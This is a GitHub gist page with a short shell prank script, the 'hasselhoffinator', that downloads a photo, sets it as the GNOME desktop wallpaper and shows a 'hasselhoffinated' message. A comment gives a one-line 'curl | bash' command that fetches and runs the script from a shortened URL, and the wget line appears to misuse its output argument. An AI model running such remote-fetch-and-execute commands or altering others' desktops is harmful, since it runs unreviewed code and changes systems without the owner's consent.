Skip to content

Instantly share code, notes, and snippets.

@fdavidcl
Forked from angrykoala/hasselhoffinator.sh
Last active October 19, 2015 11:19
Show Gist options
  • Save fdavidcl/d8407797a5509e5a24f4 to your computer and use it in GitHub Desktop.
Save fdavidcl/d8407797a5509e5a24f4 to your computer and use it in GitHub Desktop.
# The hasselhoff attack taken to a new level
# curl -L http://git.io/pxu2 | bash
TARGET=`echo ~`/hasselhoff.jpg
wget http://www.ljpaez.es/imagen/hasselhoff.jpg $TARGET
gsettings set org.gnome.desktop.background picture-uri file:///$TARGET
xmessage -center "you have been hasselhoffinated"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment